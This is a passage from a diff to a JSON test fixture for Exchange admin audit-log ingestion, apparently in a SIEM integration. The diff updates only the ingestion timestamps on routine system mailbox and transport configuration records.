"{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:42\",\"ExternalAccess\":true,\"Id\":\"27fdc2ec-edbd-445c-92bd-08d7ac0f1dc6\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"UMGrammar\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"MaxSendSize\",\"Value\":\"1 GB (1,073,741,824 bytes)\"},{\"Name\":\"MailRouting\",\"Value\":\"True\"},{\"Name\":\"MessageTracking\",\"Value\":\"True\"},{\"Name\":\"OMEncryption\",\"Value\":\"True\"},{\"Name\":\"OABGen\",\"Value\":\"True\"},{\"Name\":\"ClientExtensions\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}\"},{\"Name\":\"GMGen\",\"Value\":\"True\"},{\"Name\":\"SuiteServiceStorage\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -3222,7 +3222,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853167600Z", + "ingested": "2021-12-14T14:49:28.056966697Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:55\",\"ExternalAccess\":true,\"Id\":\"0caecd44-0161-44e5-0e45-08d7ac0f49d6\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Admin Audit Log Settings\",\"Operation\":\"Set-AdminAuditLogConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"},{\"Name\":\"AdminAuditLogEnabled\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -3291,7 +3291,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853172700Z", + "ingested": "2021-12-14T14:49:28.056967232Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:52\",\"ExternalAccess\":true,\"Id\":\"fd804781-7d7f-4d3a-1ef0-08d7ac0f47e4\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Transport Settings\",\"Operation\":\"Set-TransportConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\"},{\"Name\":\"HygieneSuite\",\"Value\":\"Premium\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -3360,7 +3360,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853177600Z", + "ingested": "2021-12-14T14:49:28.056967894Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:52\",\"ExternalAccess\":true,\"Id\":\"8a3c4f54-f2de-4717-dd56-08d7ac0f23be\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Transport Settings\",\"Operation\":\"Set-TransportConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\"},{\"Name\":\"OrganizationFederatedMailbox\",\"Value\":\"FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042@testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -3429,7 +3429,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853184200Z", + "ingested": "2021-12-14T14:49:28.056968541Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:06\",\"ExternalAccess\":true,\"Id\":\"627aa8ff-1411-475d-d202-08d7ac0f08a5\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\ExchangeAssistance\",\"Operation\":\"New-ExchangeAssistanceConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Organization\",\"Value\":\"testsiem.onmicrosoft.com\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -3512,7 +3512,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853190400Z", + "ingested": "2021-12-14T14:49:28.056969095Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:12\",\"ExternalAccess\":true,\"Id\":\"425128e3-4281-42f6-4ec7-08d7adfc0acd\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"Management\",\"Value\":\"True\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"DisplayName\",\"Value\":\"Microsoft Exchange Migration\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"9 GB (9,663,676,416 bytes)\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"Migration\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -3593,7 +3593,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853196300Z", + "ingested": "2021-12-14T14:49:28.056969599Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:18\",\"ExternalAccess\":true,\"Id\":\"a4912729-9b49-43b3-d21f-08d7adfc0e8e\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/TenantAllowBlocLists_F0767F09-6B4C-4F78-9234-2C0481176063\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"TenantAllowBlockLists\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/TenantAllowBlocLists_F0767F09-6B4C-4F78-9234-2C0481176063\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -3674,7 +3674,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853203900Z", + "ingested": "2021-12-14T14:49:28.056970269Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:21\",\"ExternalAccess\":true,\"Id\":\"a61cdc9a-89ef-402b-102c-08d7ac0f3592\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -3755,7 +3755,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853210Z", + "ingested": "2021-12-14T14:49:28.056970830Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:15\",\"ExternalAccess\":true,\"Id\":\"8126fd52-b16b-45c5-6aff-08d7adfc0c97\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -3836,7 +3836,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853215800Z", + "ingested": "2021-12-14T14:49:28.056971372Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:14\",\"ExternalAccess\":true,\"Id\":\"70f24b65-0224-473b-49b8-08d7adfc0c83\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -3917,7 +3917,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853221900Z", + "ingested": "2021-12-14T14:49:28.056972043Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:17\",\"ExternalAccess\":true,\"Id\":\"515c88f2-2cbf-4214-2d9b-08d7adfc0e0f\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -3998,7 +3998,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853227700Z", + "ingested": "2021-12-14T14:49:28.056972527Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:57\",\"ExternalAccess\":true,\"Id\":\"02c7f756-40e0-4c47-d49d-08d7ac0f26bd\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -4079,7 +4079,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853233400Z", + "ingested": "2021-12-14T14:49:28.056973011Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:02\",\"ExternalAccess\":true,\"Id\":\"40786a66-fbd5-4a24-d9af-08d7ac0f2a42\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -4160,7 +4160,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853239200Z", + "ingested": "2021-12-14T14:49:28.056973561Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:15\",\"ExternalAccess\":true,\"Id\":\"ebda487f-6177-432a-e91d-08d7adfc0d0d\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 